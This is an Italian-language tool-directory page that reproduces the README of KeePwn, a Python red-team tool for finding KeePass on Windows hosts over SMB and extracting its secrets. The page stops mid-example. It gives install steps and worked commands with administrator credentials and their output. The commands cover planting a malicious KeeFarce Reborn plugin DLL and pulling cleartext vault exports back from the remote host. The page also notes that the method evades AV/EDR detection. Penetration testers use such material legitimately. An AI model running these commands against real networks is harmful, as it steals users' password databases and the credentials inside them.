Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
KeePwn — Uno strumento Python per automatizzare la scoperta di KeePass e l'estrazione di segreti. | Kitploit
Strumenti/GitHubGitHub/orange-cyberdefense/keepwn
Password CrackingExploitPost-ExploitRed Teaming
GitHuborange-cyberdefense/keepwn

KeePwn

Uno strumento Python per automatizzare la scoperta di KeePass e l'estrazione di segreti.

Vedi Repository
52754141 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Uno script Python per aiutare i red team a scoprire le istanze di KeePass ed estrarre i segreti.

Funzionalità

  • Scoperta di KeePass
    • Cerca i file di installazione di KeePass tramite la condivisione SMB C$.
    • Accetta più sorgenti di target (IP, CIDR, hostname, file).
    • Controlla i metadati di KeePass (versione, ultimo accesso).
    • Controlla la presenza del processo di KeePass in esecuzione tramite RPC basato su Impacket.
    • Implementazione multi-thread per evitare host collo di bottiglia.
    • Esporta i risultati della ricerca in CSV.
    • Trova i database KDBX.
  • Abuso dei plugin di KeePass
    • Aggiungi e rimuovi plugin di KeePass (vedi KeeFarce Reborn) tramite la condivisione SMB C$.
    • Recupera esportazioni in chiaro sul host remoto.
  • Abuso dei trigger di KeePass
    • Aggiungi e rimuovi trigger (vedi: KeeThief) dal file di configurazione di KeePass tramite la condivisione SMB C$.
    • Recupera esportazioni in chiaro sul host remoto.
    • Personalizza i trigger con argomenti da riga di comando.
  • Analisi dei dump di memoria di KeePass
    • Analizza i dump di memoria per trovare possibili password master (CVE-2023-32784).
    • Analizza i dump di memoria per trovare la chiave di crittografia.
  • Cracking dei database di KeePass
    • Converte KDBX in formati compatibili con John e Hashcat.
    • Aggiungi supporto per il formato KDBX 4.x.
  • Autenticazione
    • Supporta l'autenticazione con hash LM/NT.
    • Supporta l'autenticazione Kerberos.
  • Varie
    • Scrivi test unitari.
    • Rendi il progetto disponibile su PyPI.

Installazione

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help

Oppure, se non vuoi installare ma solo eseguire in un virtualenv:

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
python3 KeePwn.py --help

Utilizzo

Scoperta

Il modulo search di KeePwn viene utilizzato per identificare gli host che eseguono KeePass nel tuo ambiente target:

$ python3 KeePwn.py search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt

[*] Starting remote KeePass search with 5 threads

[PC01.COMPANY.LOCAL] No KeePass-related file found
[PC02.COMPANY.LOCAL] No KeePass-related file found
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC04.COMPANY.LOCAL] No KeePass-related file found
[PC05.COMPANY.LOCAL] No KeePass-related file found

Utilizza la condivisione C$ integrata di Active Directory per cercare file relativi a KeePass nelle posizioni predefinite, richiedendo quindi privilegi di amministratore sui target.

Il modulo cercherà prima il file di configurazione KeePass.config.xml nella cartella %APPDATA%\KeePass di ciascun utente, così come KeePass.exe nel suo percorso di installazione predefinito (C:\Program Files\KeePass Password Safe 2). Se viene trovato un file di configurazione ma KeePass non è installato a livello globale, KeePwn cercherà installazioni portatili fino a --max-depth sottocartelle.

Questa tecnica di ricerca di base dovrebbe essere sufficiente per determinare con precisione se KeePass viene utilizzato su una workstation o meno. Inoltre, l'opzione --get-process utilizza l'implementazione RPC di Impacket per determinare se KeePass è attualmente in esecuzione sul target.

Sono incluse anche varie opzioni di comodità che consentono di esportare i risultati della ricerca in un file CSV, visualizzare solo i target in cui è stato trovato KeePass e regolare il numero di thread paralleli:

$ KeePwn search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv

[*] Starting remote KeePass search with 4 threads

[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC03.COMPANY.LOCAL] Found running KeePass.exe process (User: COMPANY\jdoe, PID: 3820)

[+] Search results logged to keepwn_out.csv
Abuso dei plugin

KeePass fornisce un framework per plugin che può essere abusato per caricare DLL dannose nel processo di KeePass, consentendo agli attaccanti con diritti di amministratore di esportare facilmente il database (vedi: KeeFarceRebornPlugin).

Il modulo plugin di KeePwn consente di:

  • Elencare i plugin attualmente installati e fare un'enumerazione della cache dei plugin

    $ KeePwn plugin check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                   
    
    [*] No path specified, searching in default locations..
    [*] Found dbBackup.plgx in folder '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [*] Found pDhkzWQYiobXhtBEEnbo in folder '\\C$\Users\jdoe\AppData\Local\KeePass\PluginCache'
    
  • Aggiungere e rimuovere i tuoi plugin dannosi

    $ KeePwn plugin add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL --plugin KeeFarceRebornPlugin.dll  
    
    [*] No path specified, searching in default locations..
    [*] Found KeePass Plugins directory '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [!] About to add KeeFarceRebornPlugin.dll to KeePass Plugins directory, do you want to continue? [y/n]
    > y
    [+] Plugin successfully added to KeePass, wait for next restart, poll and enjoy!
    
  • Effettuare il polling di %APPDATA% per esportazioni e spostarle automaticamente dall'host remoto al filesystem locale

    $ KeePwn plugin poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                  
    
    [*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE                                                                                                                                                                                
    [+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
    [+] Moved remote export to ./export.xml
    

Queste azioni vengono eseguite tramite l'accesso alla condivisione SMB C$, limitando il rilevamento da parte di AV/EDR poiché non viene eseguito alcun comando.

Abuso dei trigger

Come descritto nel post del blog di @harmj0y (e successivamente CVE-2023-24055), il sistema di trigger di KeePass può essere abusato per esportare il database in chiaro.

Il modulo trigger di KeePwn consente di:

  • Verificare se un trigger dannoso chiamato "export" è attualmente presente nella configurazione di KeePass

    $ KeePwn trigger check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
    
Scarica lo strumento